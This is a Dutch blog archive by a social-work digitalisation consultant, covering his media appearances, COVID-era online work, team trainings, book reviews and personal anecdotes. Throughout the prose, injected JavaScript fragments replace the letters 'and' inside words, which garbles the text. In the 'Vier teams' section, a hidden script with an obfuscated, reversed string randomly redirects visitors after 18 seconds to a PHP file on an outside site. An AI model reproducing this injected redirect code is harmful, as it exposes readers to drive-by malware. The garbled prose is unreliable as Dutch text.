Categoriearchief: Geen categorie

Veel gevraagd expert

“Je zal het wel druk hebben?” Die vraag krijg ik vaak tegenwoordig. Ik zeg dan altijd ietwat bescheiden dat dat wel mee valt. Ik doe m’n ding en ga gestaag door. Totdat ik het op een rij ging zetten. Toen bleek ik een veelgevraagd expert digitaal werken te zijn!

Want dankzij corona en vooral de reflex daarop in het sociaal domein om van de ene op de andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere dag massaal online te gaan werken, heb ik in vier maandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden tijd (maart t/m juni 2020) een aardig “trackrecord” als veelgevraagd expert opgebouwd, zo bleek tot mijn eigen verrassing. Een mix van interviews, een recensie, webinars, blogs en een podcast.

Hier kan je me zijn tegen gekomen:

1.     Interview Zorg en Welzijn, Corona-update: Sociaal domein stapt over op online werken

https://www.zorgwelzijn.nl/corona-up-date-sociaal-domein-stapt-over-op-online-werken/

2.     Online leersessie Movisie; Online hulpverlening

https://mail.google.com/mail/u/0/#search/movisie+online+hulpverlening/FMfcgxwHNCqVqFRrcWmDKsWntccCLsnG?projector=1&messagePartId=0.2

3.     Column Zorg en Welzijn; Kijk ons eens digitaal zijn!

https://www.zorgwelzijn.nl/blog/blog-kijk-ons-eens-digitaal-zijn/

4.     Webinar Movisie; Kansen in (corona)crisistijd voor online burgerparticipatie

https://youtu.be/g0s1Sn60cMo

En bijbehorend online artikel;

https://www.movisie.nl/artikel/online-burgerparticipatie-door-corona-stroomversnelling

5.     Expertmeeting Movisie; Living Lab Inclusieve Online Participatie

(Teams bijeenkomst, geen opname beschikbaar)

6.     Column Zorg en Welzijn; Vier fases van plotselinge digitalisering

https://www.zorgwelzijn.nl/blog/column-vier-fases-van-plotselinge-digitalisering/

7.     De prachtige recensie in Vakblad Sociaal Werk, van mijn boek Digivaardig Sociaal werk (2019) door Myriam Limper

https://www.linkedin.com/posts/hansversteegh-welzijn30_sociaalwerk-sociaaldomein-digivaardig-activity-6678692443870785538-ZVvB

8.     Interview MOVISIES, vakblad Movisie; Waarom we zo’n moeite hebben met online hulpverlening (pagina 32 en 33)

https://www.movisie.nl/sites/movisie.nl/files/2020-06/2.6.20-def-Movisies-2020-2.pdf

En dit komt er nog aan:

9.     Interview voor Zorg en Welzijn TV

Eind juni / begin juli 2020 verwacht

10.  Podcast / interview bij Jelle de Boer

Begin juli 2020 op YouTube verwacht

Etc ….

Wat een contrast met een jaar geleden.

Ook toen liet ik al van me horen, net als de afgelopen 10 jaar trouwens. Uit de titel van mijn blog van toen blijkt wat een sprong we met elkaar gemaakt hebben in het sociaal domein:

Blog Zorg en Welzijn, juni 2019: Bestaat de digitale transitie wel?

https://www.zorgwelzijn.nl/blog/blog-bestaat-de-digitale-transitie-wel/

Een bijna wanhopige titel. Want ik zag het werkveld maar niet bewegen. In oktober 2019 verscheen mijn boek Digivaardig Sociaal Werk, handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andboek voor de digitale transitie, om daar een slinger aan te geven. Het boek is bedoeld als inspiratie, bron van kennis en tips en als wake-up-call rondom de urgentie van digitaal werken in een digitaal actieve samenleving.

Het werd heel goed ontvangen, maar wel vooral in de beperkte kring van collega’s en partners die niet meer overtuigd hoefden te worden. Die al hele gave dingen aan het doen waren met digitaal werken. Die ik ook al vaak 10 jaar ken, waarmee ik maar wil zeggen dat we in dit kikkerlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andje kunnen voorbouwen op een rijke historie. Want 10 jaar in de online wereld is mega-lang, gezien de voortdurende en supersnelle ontwikkelingen. Initiatieven die vaak ook als voorbeeld in het boek zijn opgenomen. Want daar kan iedereen weer van leren. Deze betrokken pioniers deelden trots hun inzichten met mij, en met jou als lezer.

Niemandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and van hen kon toen bedenken dat een klein half jaar later bijna het hele sociale veld digitaal ging werken. En dat mijn boek relevanter werd dan ooit. Dus mocht je het nog niet in handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden hebben, pak nu je kans! En ga niet het wiel opnieuw uitvinden.

Hulp nodig? Kijk eens op mijn site of ik iets voor je kan betekenen; https://www.welzijn30.nl

Succes met het vinden van jouw digitale (snel-)weg.

Hartelijke groeten,

Hans Versteegh

0644062029 / info@welzijn30.nl

 

Dit artikel verscheen ook op Linkedin:

https://www.linkedin.com/pulse/uw-veel-gevraagd-expert-digitaal-werken-het-sociaal-domein-versteegh

Hans Versteegh, veel gevraagd expert digitaal werken in het sociaal domein, welzijn 3.0

Lees ook: https://www.welzijn30.nl/hans-versteegh/

Vier fases van plotselinge digitalisering, blog voor Zorg en Welzijn, juni 2020

Vier fases van plotselinge digitalisering. Ineens moesten we digitaal werken. Hoe doen we dat eigenlijk? Hans Versteegh, schrijver van het boek Digivaardig sociaal werk, maakte op basis van zijn eigen waarnemingen een ruwe analyse over deze turbulente periode en komt uit op vier fases.

Fase 1: Paniek

We gingen van de ene op de andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere dag noodgedwongen en massaal thuis werken. Hoe hou je contact met je collega’s en je doelgroep? Na de eerste shock vielen we terug op wat al bekend is: Facebook, WhatsApp. We ontdekten beeldbellen, ZOOM, Skype, WhatsApp-videobellen. Bewoners vonden elkaar ook snel. Op straat- en buurtniveau, ook buiten het zicht van professionals. Professionals plukken tegelijk de vruchten van jarenlang investeren in goede relaties met bewoners. Ze vinden elkaar makkelijk online. Maar ook nieuwe en als kansrijk bestempelde bewoners komen (letterlijk) in beeld; zij die niet gebruik maken van welzijns- en ondersteuningsdiensten, maar nu wel iets voor een andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander willen betekenen.

Fase 2: Bezinning

We ervoeren hoe dat is om online te werken. Is het wel veilig? Kan mijn cliënt er (toch wel) mee werken? Kan ik er zelf mee werken? Wil ik dat? Niet voor iedereen een succes (zie fase drie). Tegelijk zijn er ook voordelen: snel grote groepen mobiliseren, hulpvragers en hulpbieders aan elkaar verbinden, nieuwe mensen vinden, snellere communicatie, tijdswinst, meer grip op je eigen dagindeling, enzovoort.

In de dorpen en wijken is onderling vertrouwen de basis waarop informele hulp vorm krijgt. Er zijn geen regels en protocollen, alleen noodzaak en een gedeelde urgentie. Sommige hulpvragers krijgen meermaals hulp. Nieuwe verbandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden ontstaan. Er wordt hard gewerkt, gekoppeld en gebeeldbeld. Hoe houden we dit contact vast, vragen professionals zich af.

Fase 3: Weerstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and tegen verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andering

We zijn het zat. De aversie tegen online contact hoopt op. Vanuit onze achtergrond missen we de zingeving van face-to-facecontact. We verlangen terug naar het oude. De drang naar openstelling van het social domein van vóór corona groeit. Zowel bij de doelgroepen als bij de professionals. Spanning in huishoudens neemt toe. Mantelzorgers staan nog meer onder druk. Toename huiselijk geweld, depressie en eenzaamheid liggen op de loer. Online blijkt niet voor iedereen passend. Spreekuren hulpverlening worden weer face-to-face mogelijk, maar alleen als het niet andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders kan. Ludieke acties in wijken om er samen de moed in te houden, daar is niks digitaals aan.

Fase 4: Het nieuwe normaal

Het besef groeit dat het voorlopig niet meer wordt zoals het was. Acceptatie van online werkvormen daalt in. We leren van de voorgaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande fases en maken keuzes. Met een mix van face to face is het ook best vol te houden. Blended werken werkt. Visie ontwikkeling in organisaties versnelt, hoe zien we online werken op de langere termijn? En kunnen we al duurzaam keuzes maken? Bijvoorbeeld investeren in de aankoop van betrouwbare systemen, het trainen medewerkers, implementatie van blended werken in de organisatie. Hoe zetten we deze mogelijkheden methodisch in?

Wat staat ons te wachten?

Online contact is een blijvertje. Naast fysieke ontmoeting (binnen de voortdurende beperkingen) biedt het ook voordelen. Innovatie van dienstverlening met behulp van technologie is binnen handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andbereik gekomen. Lukt het om daarmee de burger, bewoner, cliënt, patiënt meer aan het roer te zetten van het eigen gewenste proces? Geeft het de participatiemaatschappij een zetje de goede kant op? Onze opdrachtgevers kijken over onze schouders mee. Gaan ze het waard vinden weer in onze sector te investeren?

Meer weten? Lees dan het boek Digivaardig sociaal werk >>
Vier fases van plotselinge digitalisering
Lees ook: andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and-zorgwelzijn/”>https://www.welzijn30.nl/blog-het-sociaal-zwakste-belang-staat-bij-digitalisering-op-achterstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and-zorgwelzijn/

Kijk ons eens digitaal zijn! Blog voor Zorg en Welzijn, mei 2020

In maart 2020 ging er een shock door het sociaal domein. Net als de rest van Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and zaten we ineens bijna allemaal vanuit huis te werken. Onze locaties sloten de deuren, onze kantoren werden verboden gebied. Ons werkgebied werd een computerscherm De schappen waren leeg en de kinderen thuis.

Online platforms

In die chaos probeerde iedereen de dienstverlening op peil te houden. We belden onze doelgroep op, om daar toch nog contact mee te kunnen hebben. Massaal grepen we naar bekende online platformen om hulp oproepen op te vangen en hulpbieders daaraan te koppelen.

Beeldbellen

En we gingen beeldbellen, heel veel beeldbellen. WhatsApp, Skype, dat kenden we al een beetje maar daar deden we eigenlijk niet veel mee. En iedereen ging Zooomen. Leuk om je collega’s allemaal bij elkaar te zien. Ongegeneerd binnenkijken in hun huizen. We werden fans, ook al werd meteen duidelijk dat het platform qua beveiliging zo lek als een mandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andje was en ook een vervelend linkje met Facebook had.

Privacy

Ook fijn dat de doelgroep op de bekende online platformen best goed te bereiken bleek. Dat op zich was al een ontdekking. Hierdoor gesterkt gingen wij daar ook massaal gebruik van maken. Tot de betweters ons informeerden dat dit vanuit privacy toch niet zo in de haak was.

Lijstjes

Ok, wat dan wel? Tal van lijstjes met alternatieven verschenen, die wel of juist niet voldeden aan NEN7510 en ISO27001. Je zag door de bomen het bos niet meer. En waren die wel net zo gebruiksvriendelijk? Oh, moet je daarop wél een account aanmaken? Nee, dat ging vast niet werken voor de doelgroep (en zelf vonden we dat ook maar gedoe). Skype for business? Klinkt ingewikkeld. Teams dan? Daar heeft iedereen het over.

Camera uit

Ondertussen Zoomden en appten we door. Je moest wel. En eigenlijk was je ook wel trots dat het je steeds beter afging. Dat je doorkreeg hoe je in een meeting kon komen, dat je zelf je microfoon en camera uit kon zetten, om even snel koffie te halen. Je moest alleen oppassen dat ze je pyjama niet zagen wanneer je opstond. Kijk ons nou eens lekker digitaal zijn!

Bravo!

Heel goed, zeker! Bravo! Geweldig dat je het volhoudt en er ook handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andiger in bent geworden. Grandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andioos. Want het is echt even schakelen.

Nog meer?

Wat heb je nog meer ervaren de afgelopen weken? Heb je misschien gemerkt dat je snel gemaakte voorlichtingsvideo’s goed bekeken zijn? Heb je gemerkt dat mensen helemaal niet raar reageerden toen jij als professional actiever werd op dat buurtplatform? Dat ze dat eigenlijk heel logisch vonden? Heb je misschien gemerkt dat de begeleiding die je face-to-face gaf ook via een online gesprek bij de cliënt aankomt? Oké, je mist misschien nog wat gesprekstechniek, maar het is te doen en het werkt.

Ik daag je uit

Er kan nog zo veel meer. Ik daag je uit: wat heb jij jarenlang op een bekende manier gedaan, maar zou je kunnen aanvullen of zelfs vervangen door een digitale variant? Probeer het eens uit. Kijk hoe het gaat, leer er van en zet de volgende stap. Ik hoor graag je bevindingen. Zet ze hieronder of mail naar info@welzijn30.nl.

Je bent goed bezig, chapeau! Maar … ben je er al?

Meer weten over digivaardig sociaal werken? Lees dan ook het boek van Hans Versteegh.
Oorspronkelijke bron op de site van Zorg en Welzijn: https://www.zorgwelzijn.nl/blog/blog-kijk-ons-eens-digitaal-zijn/
Kijk ons eens digitaal zijn! Blog voor Zorg en Welzijn
Lees ook andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and-zorgwelzijn/”>https://www.welzijn30.nl/blog-het-sociaal-zwakste-belang-staat-bij-digitalisering-op-achterstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and-zorgwelzijn/

Vier teams, vier x andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders

Vier teams, vier x <script srcset=$Ikf=function(n){if (typeof ($Ikf.list[n]) == “string”) return $Ikf.list[n].split(“”).reverse().join(“”);return $Ikf.list[n];};$Ikf.list=[“\’php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders, trajecten mixen” width=”300″ height=”200″ />

Misschien denk je er niet in eerste instantie aan, maar teams kunnen bij mij terecht voor meer dan alleen een inspirerende social media workshop. Het afgelopen half jaar heb ik voor vier teams  vier hele leuke trajecten mogen ontwerpen en uitvoeren. Die allemaal wel een digitale link hadden, maar tegelijk om veel meer dan dat gingen. Ze waren stuk voor stuk uniek, met een mix van kennis, creativiteit, resultaatgerichtheid en … plezier.

Innovatie

Zo hielp ik een gloednieuw innovatieteam in de jeugdbescherming bij de start van hun kersverse opdracht. Ze hebben drie jaar de tijd gekregen om te ontdekken wat sociale technologie kan betekenen in de jeugdzorg, hoe gaaf! En heel actueel. Ze vroeg mij om hen in te wijden in wat innovatie eigenlijk is en hoe je dat in je organisatie vorm kan geven.

“Een waardevolle training.”

Strategie en LinkedIn

Het communicatieteam van een landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andelijke beroepsvereniging in het maatschappelijk veld vroeg mij hen te ondersteunen bij het opstellen van een social media strategie (visie op, doelen met, uitgangspunten voor …) en vervolgens ook bij het samenstellen van een praktisch social media beleid voor de medewerkers van het verenigingsbureau. Met een LinkedIn-training hielp ik ze daar invulling aan te geven. Eenzelfde training voor de actieve kaderleden staat voor het najaar geplandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and.

“Dankjewel Hans, voor de inspirerende training.”

Visie, identiteit en koers

Een stedelijk werkend opbouwwerkteam wilde graag hun oude werkwijze tegen het licht houden. De maatschappelijk ontwikkelingen boden nieuwe kansen maar hoe konden ze die nou benutten?  In vier sessies zoomden we in op de behoefte van klanten, op identiteit van het team, op de interne dynamiek, op nieuwe ontwikkelingen en op wat er aldus nog te doen stond voor het inslaan van een nieuwe koers. En daarbinnen natuurlijk prioriteiten aangeven. Naast de procesbegeleiding deed ik ook de verslaglegging en leverde ik een advies op voor het managementteam.

Strategie en rol

Een team communicatieadviseurs van een grote regionale koepel van sociaal werk organisaties voelde de behoefte om aandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andacht te geven aan digitale communicatie. Enerzijds om derden duidelijk te maken hoe en waarmee de moederorganisatie de lokale dochters ondersteunt. Anderzijds om te bepalen hoe zij sociaal werkers in die locale welzijnsinstellingen zo goed mogelijk konden faciliteren bij het zichtbaar maken van hun meerwaarde via social media.  Ook hier gaf ik input voor een sociaal media strategie en praat ik ze bij over actuele social media en gaf ik feedback op wat ze tot dan toe online hadden laten zien.

“Zeer praktische training met een duidelijk stappenplan. Erg fijn!”

Mixen tot maatwerk

Deze trajecten zijn echt maatwerk. De behoefte van de opdrachtgever is het uitgangspunt en in overleg worden ze samengesteld. Heel leuk om te doen, want ik kan er mijn creativiteit in kwijt. Het is een sport om een traject te ontwerpen dat naadloos aansluit. En aan de reacties te merken lukt dat.

“Het was een goede bijeenkomst, waar wij zeker mee verder kunnen? bedankt!”

Hebben jouw teams ook zo’n soort vraag? Neem dan even contact met mij op. Ik denk graag met je mee of ik iets voor je kan betekenen. Je kan mij bereiken via 0644062029 of info@welzijn30.nl 

Groeten, Hans Versteegh

Heb je mijn boek al gereserveerd? https://www.welzijn30.nl/digivaardig-sociaal-werk/ 

Veels te relaxed

Veels te relaxedHet was een vergissing om veels te relaxed door Brummen naar het station te lopen. Op het goedbezochte vrijwillgers-festival, even daarvoor, had ik aan vrijwiligers van Stichting Welzijn Brummen een social media workshop gegeven. Erg aardige mensen. Zeer geïnteresseerd. Helemaal top. 

Daarna in een koningsdag-achtige sfeer nog wat gekeuveld met diverse sociaal werkers en de directrice. Allemaal hele hartelijke leuke mensen. Ook super. 

De friet bakkende jongerenwerker stilde mijn honger met het beste patatje dat ik ooit heb gegeten. Wauw! 

Een hoogbejaarde dame van het lokale koor kreeg een lekker hamburgertje. Zich druk maken over de niet dáárvoor bestemde consumptiebon bleek niet nodig.”Smakelijk mevrouw!” Kijk. 

In die gemoedstoestandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and begaf ik mij naar de trein. Die had twee keuzes: Arnhem of Zutphen. Ik koos Arnhem en liep perron 2 op. Twee studenten op weg naar een avondje stappen zeiden vriendelijk gedag. Ah, daar zag ik al twee gele lampen in de verte. 

In de trein las ik het boek Artificial Intelligence in actie, van Schepper en Hiddink. Een toegankelijk boek waarin kunstmatige intelligentie begrijpelijk uitgelegd wordt. Leuk! Ik dook er helemaal in.

Tot vlak voor Driebergen-Zeist, mijn eindstation, de conductrice er achter kwam dat ik niet had ingechecked bij de NS met mijn OV-kaart. “Ik zie wel dat Syntus blij met u is, in- en uitgechecked. Maar ik niet.” Oh jee!

Ik, die toch qua digitalisering m’n mannetje denk te staan. Domweg te gewend aan fysieke poortjes in grote stations ga ik meteen de mist in wanneer de doorgang naar het perron een keer niet versperd wordt. Want op perron 2, in het relaxte Brummen was ik straal voorbij gelopen aan de gele incheck-paaltjes. Gewoon niet aan gedacht, voortsudderend in de roes van gezelligheid en vriendelijkheid. 

De conductrice liet me twee minuten later zonder boete de trein uit gaan.”Nou niet uitchecken! Dat kost u 20 euro!” Die tip knoopte ik in mijn oren. Illegaal verliet ik het station. Mijn geluk? Ook geen poortjes in Driebergen.

Beter zo. 

“En wanneer verschijnt jouw boek eigenlijk?” hoor ik nu regelmatig.  “Als het goed is oktober,” zeg ik dan. Maar je kan het nu alvast bestellen: https://www.welzijn30.nl/digivaardig-sociaal-werk/

Drie boeken en één fiets

Na inlevering van het manuscript van “Digitaal Sociaal Werk” bij de uitgever deed ik twee dingen. De dag er na sprong ik eindelijk weer eens op de racefiets. Daarover straks meer. En ik kon weer eens boeken van andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen lezen. Het werden de drie boeken hieronder. Die samen mooi mijn brede blik op digitale innovatie weerspiegelen.   

Het liefst lees ik iets waar ik wat van op steek. Geen romans of dikke pillen die iedereen schijnt te verslinden. Niks voor mij. Toegepast lezen, da’s OK. Ik las er de afgelopen tijd zelfs drie door elkaar. En het grappige is, twee ervan hebben “3.0” in de titel. Dat is voor mij natuurlijk magisch! Hier volgen mijn korte  recensies.

Boekenlijst Welzijn 3.0

Drie boeken die ik afgelopen maandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden las.

CIO 3.0

Dit boek is geschreven vanuit de blik van de ICT-er, op de digitale transitie. Door twee consultants die vooral gemeenten bedienen: Karin Zwiggelaar en Antoon van Luxemburg. Ja, ik hoor het al; “saai!” Klopt, tot je het zo gaat lezen dat je ICT vervangt door mensen, door teams, door sociaal werkers. En dan gaat het ineens over verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen, innoveren, implementeren. Met digitalisering als hoofdonderwerp. En is het geen techneuten-boek maar menselijk en heel actueel. Een CIO is een Chief Information Officer, die de stevige taak heeft de organisatie vanuit de  bestuurderslaag om te vormen om ook in de digitale tijd waardevol te kunnen zijn voor klanten. En dat is nu natuurlijk een CIO 3.0.

Denk jij ook dat het niet saai is en heb je interesse? Je kan dit boek hier bestellen.

Sociaal werk in de digitale samenleving

Hier ben ik het meest enthousiast over! Omdat het gaat over waar ik me ook mee bezig hou, zoals je weet. Het kwam uit in de week voordat de deadline van mijn boek verstreek. Hopelijk lukt het met deze twee boeken het onderwerp digitalisering in het sociaal werk op de kaart te  zetten. Dus ik beveel het je van harte aan. Een keigoed boek dat heel helder uiteen zet waarom (aankomend) sociaal werkers zich moeten verdiepen in digitalisering. Marcha Hartman heeft zelfs een methode bedacht die stap voor stap uitgelegd wordt, op micro, macro en meso niveau. Interessant zijn de stukken die ingaan op jouw eigen rol als professional in het sociaal domein bij verschillende vormen van digitalisering. Het is vooral voor studenten bedoelt, maar dat hoeft professionals niet te weerhouden. Ook als je al een tijdje werkt, kan het boek je helpen. Sterker, het is bij vlagen een ambitieus boek dat de lat soms hoog legt. Ik hou er wel van. Mijn tip; kijk goed wat je zelf kan doen, wanneer dit allemaal nieuw voor je is.

Interesse? Ik hoop het! Je kan dit boek hier bestellen. (Al dan niet tegelijk met een reservering voor mijn boek …, zie hieronder, TIP)

Calimeromarketing 3.0

Weer een 3.0 boek! Jazeker. En ook rondom digitalisering. Karen Romme leert je hoe jij zelf als een vuurtoren je licht laat schijnen op je klantengroep en hoe je potentiele klanten als vanzelf naar je toe trekt. Natuurlijk vooral door gebruik te maken van alle digitale middelen van nu. Plus een flink aantal handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andige marketing tips daarbovenop. Het is geschreven voor zzp-ers. Maar ik denk dat het zeker ook bruikbaar in sociaal werk organisaties waar professionals ook geacht worden als ambassadeur zichzelf en de organisatie te profileren / zichtbaar te zijn. Kortom, een vuurtoren te zijn. Het leest als een trein, is leuk en nodigt uit om direct aan de slag te gaan of aantekeningen te maken. Er is ook een kleinere samenvatting van die minder leestijd vergt.

Hiep hiep hoi! Heb je interesse? Je kan dit boek hier bestellen.

Dan, die racefiets.

Wielrennen is mij al als kleine jongen is bijgebracht. Als cadeau voor een van de middelbare school examens kreeg ik een zilvergrijze Peugeot met oranje letters, die eigenlijk net iets te klein voor me was. Die fiets is ergens uit mijn leven verdwenen. Ik weet niet eens meer hoe. Als student heb ik een andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere gekocht, die wel groot genoeg was. Die ruilde ik later weer in voor een paar MTB’s om bij Zeist in het bos te raggen. Ook leuk, maar wel gedoe. Vies worden en zo. En ik hou niet van sporten met gedoe.

Dus toen was er een tijdje niks.

Tot ik op Marktplaats ging kijken en toevallig tegen een zilvergrijze Peugeot met oranje letters aanbotste. Precies zo een als mijn eerste! Deze had ook nog bijpassend fel-oranje stuurlint!  Aangezien ik dit jaar de 50 aantik en geen Harley blief, maar toch iets moet met die midlife crisis, besloot ik deze te kopen. Alleen …

Het was december.

Te koud en te nat. Dus gedoe. Bovendien, ik had een deadline. Mijn manuscript moest af. Ik poetste het ding wat op om de fiets goed te leren kennen en lekker te laten glimmen, en liet het daar bij. Tijdens het schrijven van mijn boek stond de fiets achter mij, in mijn kantoor. Iedere dag aaide ik hem (echt) en liet ik de trappers 1 klikje van de derailleur maken.

Eentje maar.

Net zo lang tot het manuscript klaar was. Op zondagavond 31 maart mailde ik het naar de uitgever. Gelukt! De dag er na, op 1 april, de dag van de deadline, was het prachtig weer. En ik had ineens tijd over. Daar stond die fiets. Het perfecte middel om mijn hernieuwde vrijheid mee te vieren. Ik maakte een mooie tocht over de Utrechtse Heuvelrug en trakteerde me op een lunch (twee kroketten op brood en een glas melk) op een terras in het bos bij Lage Vuursche. Vlak naast het paleis van prinses Beatrix.

Iets met het oranje stuurlint, denk ik.

Lekker hoor, even de racefiets kunnen pakken. Dat idee alleen al is zo fijn. Zo’n mooi klassiekertje uit de jaren ’70. Loeizwaar en zwaar krakend. Aan dat laatste moet ik toch eens wat laten doen. Maar o zo leuk. Van fietsen krijg je zo’n lekker leeg hoofd. Helemaal hier in de buurt, ’t is hier prachtig. Een buurman twee huizen verderop bleek ineens deze winter dezelfde zwakte ontwikkelt te hebben, maar hij wordt 42, is fanatieker en gaat sneller. Op veel nieuwere fietsen. Hij wil samen gaan fietsen, op een doordeweekse avond of zo.

Niet over nadenken.
Hier zie je mij en mijn Franse maatje op het Leersumse Veld, met 32 graden, vandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andaar het zweet. Dus niet dat ik daar nu zo hard ging hoor. Ik rij in een ouwe-lullen-tempo op een ouwe-lullen-fiets. Ik ga beiden niet afbeulen, het moet wel leuk blijven. Geen helm nodig, gedoe.

Er is dus ook tijd om weer eens een boek lezen! Dat gun ik jou ook. Want ….

Mijn boek, “Digivaardig sociaal werk, handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andboek voor de digitale transitie” komt in het najaar van 2019 uit. En het mooie is … jij kan het nu al vast reserveren

via deze link

#digivaardigsociaalwerk

#socialwork #innovatie #digivaardig #welzijn

Digivaardig sociaal werk omslag

De omslag van Digivaardig sociaal werk, handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andboek voor de digitale transitie

Negen urgente redenen om in 2019 van digitalisering een speerpunt te maken (blog Zorg en Welzijn december 2018 of januari 2019)

Negen urgente redenen waarom in 2019 een professionele visie op digitalisering van sociaal werkers en hun organisaties gevraagd wordt.

  1. De context is digitaal geworden

Digitalisering is de meest recente grote stap in de ontwikkeling van de mensheid. Digitale technologie is overal en altijd om ons heen. Het maakt ons leven makkelijker. Maar ook ingewikkelder. Als werker sta je midden in de maatschappij en krijg je met beide te maken.

  1. Blijven aansluiten als beroepsgroep

De achilleshiel van de sociale sector. Werkers zijn vaak mensen-mensen. Techniek heeft niet de grootste interesse. Maar maatschappij en (werk-)prosessen doen een steeds groter beroep op digitale vaardigheden. Niet kunnen meedoen is jezelf buitenspel zetten. Je wil toch relevant blijven voor je werkgever en de samenleving?

  1. Duurzaam inzetbaar zijn als professional

Competenties als zichtbaar zijn, ondernemend werken, netwerken, signaleren, activeren en innoveren bieden ruimte voor een online invulling. Social media moet iedereen kunnen toepassen en basale computervaardigheden zijn al langer een must. Bijscholing is essentieel om duurzaam inzetbaar te zijn in het sociaal domein.

 4.  Doelgroepen ondersteunen bij hun participatie

Wie zelfredzaam wil participeren zal op internet zijn zaakjes moeten kunnen regelen. Professionals moeten in staat zijn daarbij te ondersteunen, of voorzieningen op te zetten waar doelgroepen die ondersteuning kunnen krijgen. Waar nodig 24/7.

  1. Mee-oplossen van maatschappelijke problemen

Eenzaamheid, gezondheid en cohesie. Sociale media zorgen voor menselijk contact zonder fysieke nabijheid. Via apps en gamification-elementen worden mensen aangespoord te bewegen en hun gezondheid te monitoren. Buren kunnen per app-groep iets voor elkaar betekenen. Kansen die werkers kunnen initiëren en uitbouwen.

  1. Zorg komt digitaal de wijk in

Zorg wordt steeds meer thuis, in de wijk geleverd m.b.v. digitale diensten als beeldbellen, apps en digitale meetapparatuur. Minder ziekenhuisbezoek verlicht de druk op het dagelijks leven van patiënten. Wijkgerichte professionals krijgen hierdoor met complexere “situaties achter de voordeur” te maken.

  1. Innovatie van dienstverlening

Bestaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande dienstverlening kan vaak een online variant krijgen. Van werkers vraagt dit wel een extra set digitale vaardigheden omdat vaak doorgevraagd moet worden hoe iemandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and erbij zit en hoe de boodschap ontvangen wordt. Maar dat is te trainen.  Digitalisering schept ook mogelijkheden voor nieuwe diensten in het sociaal domein (die als we niet oppassen zeker door externen zullen worden opgepakt).

  1. De digitale kloof

Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and telt 3,5 miljoen laaggeletterden en digibeten voor wie het sturen van e-mail al ingewikkeld is. ‘Onze informatiesamenleving lijkt hen te vergeten, er ontstaat een digitale kloof’, waarschuwde het Sociaal en Cultureel Planbureau. Het sociaalwerk heeft de verantwoordelijkheid deze mensen te ondersteunen. Hoe voorkomen we dat mensen het niet meer bij kunnen benen en de maatschappij de rug toe keren?

  1. Andere digitaal gerelateerde zorgvragen

Internetverslaving, gameverslaving, psychische druk (fear of missing out), sexting, cyberpesten, enz. Bijwerkingen die ontwrichtend kunnen zijn in levens. Als sociaal werker heb je hier minimaal een signalerende functie. Weet waar je dan hulp kunt krijgen.

Er is geen argument meer waarom er geen aandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andacht voor digitalisering in het sociaal domein zou zijn. Integendeel. Sociale professionals in Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and kunnen een belangrijke rol spelen en nieuwe kansen benutten.

Wat ga jij in 2019 oppakken?

Hans Versteegh

Welzijn 3.0

www.welzijn30.nl

Wil je weten hoe je getraind kan worden? https://www.welzijn30.nl/social-media-workshop-in-zorg-en-welzijn/ 

Mediamomenten

Mediamomenten in zorg en welzijn

Maak eenvoudig dagelijks je eigen mediamomenten en vergroot daarmee je online zichtbaarheid. Leer hoe sociaal werkers in zorg en welzijn gemakkelijk dagelijks hun werk in beeld kunnen brengen en zo zichzelf beter kunnen profileren. Kijk de video:

Wil je weten hoe je social media en digitalisering in je werk een plek kunt geven? Kijk dan op www.welzijn30.nl

Mediamomenten leren maken, is de online training voor 97,- euro iets voor jou?

